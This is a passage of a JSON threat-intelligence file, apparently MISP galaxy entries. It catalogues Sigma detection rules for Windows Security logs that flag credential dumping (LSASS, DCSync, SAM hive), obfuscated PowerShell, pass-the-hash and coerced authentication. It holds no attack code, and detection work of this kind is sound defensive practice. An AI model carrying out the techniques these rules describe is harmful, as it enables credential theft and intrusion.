"https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2", "https://blog.blacklanternsecurity.com/p/detecting-dcsync?s=r", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dcsync.yml" ], "tags": [ "attack.credential-access", "attack.s0002", "attack.t1003.006" ] }, "related": [ { "dest-uuid": "f303a39a-6255-4b89-aecc-18c4d8ca7163", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "611eab06-a145-4dfa-a295-3ccc5c20f59a", "value": "Mimikatz DC Sync" }, { "description": "Detects wceaux.dll access while WCE pass-the-hash remote command execution on source host", "meta": { "author": "Thomas Patzke", "creation_date": "2017-06-14", "falsepositive": [ "Unknown" ], "filename": "win_security_mal_wceaux_dll.yml", "level": "critical", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://jpcertcc.github.io/ToolAnalysisResultSheet", "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_mal_wceaux_dll.yml" ], "tags": [ "attack.credential-access", "attack.t1003", "attack.s0005" ] }, "related": [ { "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1de68c67-af5c-4097-9c85-fe5578e09e67", "value": "WCE wceaux.dll Access" }, { "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", "meta": { "author": "Timur Zinniatullin, oscd.community", "creation_date": "2020-10-13", "falsepositive": [ "Unknown" ], "filename": "win_security_invoke_obfuscation_via_var_services_security.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_var_services_security.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4c54ba8f-73d2-4d40-8890-d9cf1dca3d30", "value": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security" }, { "description": "This event is generated when an authenticated user who is not allowed to log on remotely attempts to connect to this computer through Remote Desktop.\nOften, this event can be generated by attackers when searching for available windows servers in the network.\n", "meta": { "author": "Pushkarev Dmitry", "creation_date": "2020-06-27", "falsepositive": [ "Valid user was not added to RDP group" ], "filename": "win_security_not_allowed_rdp_access.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=4825", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_not_allowed_rdp_access.yml" ], "tags": [ "attack.lateral-movement", "attack.t1021.001" ] }, "related": [ { "dest-uuid": "eb062747-2193-45de-8fa2-e62549c37ddf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8e5c03fa-b7f0-11ea-b242-07e0576828d9", "value": "Denied Access To Remote Desktop" }, { "description": "Detects process handle on LSASS process with certain access mask and object type SAM_DOMAIN", "meta": { "author": "sigma", "creation_date": "2017-02-12", "falsepositive": [ "Unknown" ], "filename": "win_security_susp_lsass_dump.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://twitter.com/jackcr/status/807385668833968128", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_lsass_dump.yml" ], "tags": [ "attack.credential-access", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "aa1697b7-d611-4f9a-9cb2-5125b4ccfd5c", "value": "Password Dumper Activity on LSASS" }, { "description": "Detects handles requested to SAM registry hive", "meta": { "author": "Roberto Rodriguez @Cyb3rWard0g", "creation_date": "2019-08-12", "falsepositive": [ "Unknown" ], "filename": "win_security_sam_registry_hive_handle_request.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://threathunterplaybook.com/hunts/windows/190725-SAMRegistryHiveHandleRequest/notebook.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_sam_registry_hive_handle_request.yml" ], "tags": [ "attack.discovery", "attack.t1012", "attack.credential-access", "attack.t1552.002" ] }, "related": [ { "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "341e222a-a6e3-4f6f-b69c-831d792b1580", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f8748f2c-89dc-4d95-afb0-5a2dfdbad332", "value": "SAM Registry Hive Handle Request" }, { "description": "Detects access to ADMIN$ network share", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-03-04", "falsepositive": [ "Legitimate administrative activity" ], "filename": "win_security_admin_share_access.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-5140", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_admin_share_access.yml" ], "tags": [ "attack.lateral-movement", "attack.t1021.002" ] }, "related": [ { "dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "098d7118-55bc-4912-a836-dc6483a8d150", "value": "Access To ADMIN$ Network Share" }, { "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", "meta": { "author": "Jonathan Cheong, oscd.community", "creation_date": "2020-10-15", "falsepositive": [ "Unknown" ], "filename": "win_security_invoke_obfuscation_var_services_security.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_var_services_security.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "dcf2db1f-f091-425b-a821-c05875b8925a", "value": "Invoke-Obfuscation VAR+ Launcher - Security" }, { "description": "Detects handle requests and access operations to specific registry keys to calculate the SysKey", "meta": { "author": "Roberto Rodriguez @Cyb3rWard0g", "creation_date": "2019-08-12", "falsepositive": [ "Unknown" ], "filename": "win_security_syskey_registry_access.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://threathunterplaybook.com/hunts/windows/190625-RegKeyAccessSyskey/notebook.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_syskey_registry_access.yml" ], "tags": [ "attack.discovery", "attack.t1012" ] }, "related": [ { "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9a4ff3b8-6187-4fd2-8e8b-e0eae1129495", "value": "SysKey Registry Keys Access" }, { "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", "meta": { "author": "Nikita Nazarov, oscd.community", "creation_date": "2020-10-09", "falsepositive": [ "Unknown" ], "filename": "win_security_invoke_obfuscation_via_use_clip_services_security.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_use_clip_services_security.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1a0a2ff1-611b-4dac-8216-8a7b47c618a6", "value": "Invoke-Obfuscation Via Use Clip - Security" }, { "description": "Backdooring domain object to grant the rights associated with DCSync to a regular user or machine account using Powerview\\Add-DomainObjectAcl DCSync Extended Right cmdlet, will allow to re-obtain the pwd hashes of any user/computer", "meta": { "author": "Samir Bousseaden, Roberto Rodriguez @Cyb3rWard0g, oscd.community, Tim Shelton, Maxence Fossat", "creation_date": "2019-04-03", "falsepositive": [ "New Domain Controller computer account, check user SIDs within the value attribute of event 5136 and verify if it's a regular user or DC computer account." ], "filename": "win_security_account_backdoor_dcsync_rights.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://twitter.com/menasec1/status/1111556090137903104", "https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_account_backdoor_dcsync_rights.yml" ], "tags": [ "attack.persistence", "attack.t1098" ] }, "related": [ { "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2c99737c-585d-4431-b61a-c911d86ff32f", "value": "Powerview Add-DomainObjectAcl DCSync AD Extend Right" }, { "description": "Detects an installation of a device that is forbidden by the system policy", "meta": { "author": "frack113", "creation_date": "2022-10-14", "falsepositive": [ "Unknown" ], "filename": "win_security_device_installation_blocked.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-6423", "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_device_installation_blocked.yml" ], "tags": [ "attack.initial-access", "attack.t1200" ] }, "related": [ { "dest-uuid": "d40239b3-05ff-46d8-9bdd-b46d13463ef9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c9eb55c3-b468-40ab-9089-db2862e42137", "value": "Device Installation Blocked" }, { "description": "Detects when adversaries stop services or processes by deleting or disabling their respective scheduled tasks in order to conduct data destructive activities", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-12-05", "falsepositive": [ "Unknown" ], "filename": "win_security_susp_scheduled_task_delete_or_disable.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4699", "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4701", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_scheduled_task_delete_or_disable.yml" ], "tags": [ "attack.execution", "attack.privilege-escalation", "attack.persistence", "attack.t1053.005" ] }, "related": [ { "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7595ba94-cf3b-4471-aa03-4f6baa9e5fad", "value": "Important Scheduled Task Deleted/Disabled" }, { "description": "Detects when the password policy is enumerated.", "meta": { "author": "Zach Mathis", "creation_date": "2023-05-19", "falsepositive": "No established falsepositives", "filename": "win_security_password_policy_enumerated.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/jpalanco/alienvault-ossim/blob/f74359c0c027e42560924b5cff25cdf121e5505a/os-sim/agent/src/ParserUtil.py#L951", "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4661", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_password_policy_enumerated.yml" ], "tags": [ "attack.discovery", "attack.t1201" ] }, "related": [ { "dest-uuid": "b6075259-dba3-44e9-87c7-e954f37ec0d5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "12ba6a38-adb3-4d6b-91ba-a7fb248e3199", "value": "Password Policy Enumerated" }, { "description": "Detects code integrity failures such as missing page hashes or corrupted drivers due unauthorized modification. This could be a sign of tampered binaries.\n", "meta": { "author": "Thomas Patzke", "creation_date": "2019-12-03", "falsepositive": [ "Disk device errors" ], "filename": "win_security_codeintegrity_check_failure.yml", "level": "informational", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-5038", "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-6281", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_codeintegrity_check_failure.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027.001" ] }, "related": [ { "dest-uuid": "5bfccc3f-2326-4112-86cc-c1ece9d8a2b5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "470ec5fa-7b4e-4071-b200-4c753100f49b", "value": "Failed Code Integrity Checks" }, { "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", "meta": { "author": "Nikita Nazarov, oscd.community", "creation_date": "2020-10-09", "falsepositive": [ "Unknown" ], "filename": "win_security_invoke_obfuscation_via_use_rundll32_services_security.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_use_rundll32_services_security.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cd0f7229-d16f-42de-8fe3-fba365fbcb3a", "value": "Invoke-Obfuscation Via Use Rundll32 - Security" }, { "description": "Detects suspicious computer name samtheadmin-{1..100}$ generated by hacktool", "meta": { "author": "elhoim", "creation_date": "2022-09-09", "falsepositive": [ "Unknown" ], "filename": "win_security_susp_computer_name.yml", "level": "critical", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://twitter.com/malmoeb/status/1511760068743766026", "https://github.com/helloexp/0day/blob/614227a7b9beb0e91e7e2c6a5e532e6f7a8e883c/00-CVE_EXP/CVE-2021-42287/sam-the-admin/sam_the_admin.py", "https://github.com/WazeHell/sam-theadmin/blob/main/sam_the_admin.py", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_computer_name.yml" ], "tags": [ "cve.2021-42278", "cve.2021-42287", "attack.persistence", "attack.privilege-escalation", "attack.t1078" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "39698b3f-da92-4bc6-bfb5-645a98386e45", "value": "Win Susp Computer Name Containing Samtheadmin" }, { "description": "Detect PetitPotam coerced authentication activity.", "meta": { "author": "Mauricio Velazco, Michael Haag", "creation_date": "2021-09-02", "falsepositive": [ "Unknown. Feedback welcomed." ], "filename": "win_security_petitpotam_network_share.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/topotam/PetitPotam", "https://github.com/splunk/security_content/blob/0dd6de32de2118b2818550df9e65255f4109a56d/detections/endpoint/petitpotam_network_share_access_request.yml", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_petitpotam_network_share.yml" ], "tags": [ "attack.credential-access", "attack.t1187" ] }, "related": [ { "dest-uuid": "b77cf5f3-6060-475d-bd60-40ccbf28fdc2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1ce8c8a3-2723-48ed-8246-906ac91061a6", "value": "Possible PetitPotam Coerce Authentication Attempt" }, { "description": "Detects modifications to the Windows Defender exclusion registry key. This could indicate a potentially suspicious or even malicious activity by an attacker trying to add a new exclusion in order to bypass security.\n", "meta": { "author": "@BarryShooshooga", "creation_date": "2019-10-26", "falsepositive": [ "Intended exclusions by administrators" ], "filename": "win_security_windows_defender_exclusions_registry_modified.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_windows_defender_exclusions_registry_modified.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "46a68649-f218-4f86-aea1-16a759d81820", "value": "Windows Defender Exclusion List Modified" }, { "description": "Detects the usage of the 'SeLoadDriverPrivilege' privilege. This privilege is required to load or unload a device driver.\nWith this privilege, the user can dynamically load and unload device drivers or other code in to kernel mode.\nThis user right does not apply to Plug and Play device drivers.\nIf you exclude privileged users/admins and processes, which are allowed to do so, you are maybe left with bad programs trying to load malicious kernel drivers.\nThis will detect Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs) and the usage of Sysinternals and various other tools. So you have to work with a whitelist to find the bad stuff.\n", "meta": { "author": "xknow (@xknow_infosec), xorxes (@xor_xes)", "creation_date": "2019-04-08", "falsepositive": [ "Other legimate tools loading drivers. Including but not limited to, Sysinternals, CPU-Z, AVs etc. A baseline needs to be created according to the used products and allowed tools. A good thing to do is to try and exclude users who are allowed to load drivers." ], "filename": "win_security_user_driver_loaded.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4673", "https://web.archive.org/web/20230331181619/https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_driver_loaded.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f63508a0-c809-4435-b3be-ed819394d612", "value": "Potential Privileged System Service Operation - SeLoadDriverPrivilege" }, { "description": "This events that are generated when using the hacktool Ruler by Sensepost", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-05-31", "falsepositive": [ "Go utilities that use staaldraad awesome NTLM library" ], "filename": "win_security_alert_ruler.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/sensepost/ruler", "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4624", "https://github.com/sensepost/ruler/issues/47", "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4776", "https://github.com/staaldraad/go-ntlm/blob/cd032d41aa8ce5751c07cb7945400c0f5c81e2eb/ntlm/ntlmv1.go#L427", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_alert_ruler.yml" ], "tags": [ "attack.discovery", "attack.execution", "attack.t1087", "attack.t1114", "attack.t1059", "attack.t1550.002" ] }, "related": [ { "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "1608f3e1-598a-42f4-a01a-2e252e81728f", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e624264c-033a-424d-9fd7-fc9c3bbdb03e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "24549159-ac1b-479c-8175-d42aea947cae", "value": "Hacktool Ruler" }, { "description": "Detects NetNTLM downgrade attack", "meta": { "author": "Florian Roth (Nextron Systems), wagga", "creation_date": "2018-03-20", "falsepositive": [ "Unknown" ], "filename": "win_security_net_ntlm_downgrade.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.optiv.com/blog/post-exploitation-using-netntlm-downgrade-attacks", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_net_ntlm_downgrade.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001", "attack.t1112" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d3abac66-f11c-4ed0-8acb-50cc29c97eed", "value": "NetNTLM Downgrade Attack" }, { "description": "Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-05-09", "falsepositive": [ "Legitimate used of encrypted ZIP files" ], "filename": "win_security_susp_opened_encrypted_zip_outlook.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://twitter.com/sbousseaden/status/1523383197513379841", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_opened_encrypted_zip_outlook.yml" ], "tags": [ "attack.defense-evasion", "attack.initial-access", "attack.t1027", "attack.t1566.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "2e34237d-8574-43f6-aace-ae2915de8597", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "571498c8-908e-40b4-910b-d2369159a3da", "value": "Password Protected ZIP File Opened (Email Attachment)" }, { "description": "Detect priv users or groups recon based on 4661 eventid and known privileged users or groups SIDs", "meta": { "author": "Samir Bousseaden", "creation_date": "2019-04-03", "falsepositive": [ "If source account name is not an admin then its super suspicious" ], "filename": "win_security_account_discovery.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://web.archive.org/web/20230329163438/https://blog.menasec.net/2019/02/threat-hunting-5-detecting-enumeration.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_account_discovery.yml" ], "tags": [ "attack.discovery", "attack.t1087.002" ] }, "related": [ { "dest-uuid": "21875073-b0ee-49e3-9077-1e2a885359af", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "35ba1d85-724d-42a3-889f-2e2362bcaf23", "value": "AD Privileged Users or Groups Reconnaissance" }, { "description": "Detects process handle on LSASS process with certain access mask", "meta": { "author": "Roberto Rodriguez, Teymur Kheirkhabarov, Dimitrios Slamaris, Mark Russinovich, Aleksey Potapov, oscd.community (update)", "creation_date": "2019-11-01", "falsepositive": [ "Legitimate software accessing LSASS process for legitimate reason; update the whitelist with it" ], "filename": "win_security_susp_lsass_dump_generic.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", "https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_lsass_dump_generic.yml" ], "tags": [ "attack.credential-access", "car.2019-04-004", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4a1b6da0-d94f-4fc3-98fc-2d9cb9e5ee76", "value": "Potentially Suspicious AccessMask Requested From LSASS" }, { "description": "Detects the addition of a new member to the local administrator group, which could be legitimate activity or a sign of privilege escalation activity", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-03-14", "falsepositive": [ "Legitimate administrative activity" ], "filename": "win_security_user_added_to_local_administrators.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4732", "https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/manage/understand-security-identifiers", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_added_to_local_administrators.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1078", "attack.persistence", "attack.t1098" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c265cf08-3f99-46c1-8d59-328247057d57", "value": "User Added to Local Administrator Group" }, { "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", "meta": { "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "creation_date": "2019-11-08", "falsepositive": [ "Unknown" ], "filename": "win_security_invoke_obfuscation_obfuscated_iex_services_security.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_obfuscated_iex_services_security.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fd0f5778-d3cb-4c9a-9695-66759d04702a", "value": "Invoke-Obfuscation Obfuscated IEX Invocation - Security" }, { "description": "Detects update to a scheduled task event that contain suspicious keywords.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-12-05", "falsepositive": [ "Unknown" ], "filename": "win_security_susp_scheduled_task_update.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4698", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_scheduled_task_update.yml" ], "tags": [ "attack.execution", "attack.privilege-escalation", "attack.persistence", "attack.t1053.005" ] }, "related": [ { "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "614cf376-6651-47c4-9dcc-6b9527f749f4", "value": "Suspicious Scheduled Task Update" }, { "description": "Detects scenarios where system auditing for important events such as \"Process Creation\" or \"Logon\" events is disabled.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-06-20", "falsepositive": [ "Unlikely" ], "filename": "win_security_disable_event_auditing_critical.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/blob/master/documentation/logsource-guides/windows/service/security.md", "https://docs.google.com/presentation/d/1dkrldTTlN3La-OjWtkWJBb4hVk6vfsSMBFBERs6R8zA/edit", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_disable_event_auditing_critical.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.002" ] }, "related": [ { "dest-uuid": "4eb28bed-d11a-4641-9863-c2ac017d910a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ab4561b1-6c7e-48a7-ad08-087cfb9ce8f1", "value": "Important Windows Event Auditing Disabled" }, { "description": "Detects non-system users failing to get a handle of the SCM database.", "meta": { "author": "Roberto Rodriguez @Cyb3rWard0g", "creation_date": "2019-08-12", "falsepositive": [ "Unknown" ], "filename": "win_security_scm_database_handle_failure.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://threathunterplaybook.com/hunts/windows/190826-RemoteSCMHandle/notebook.html", 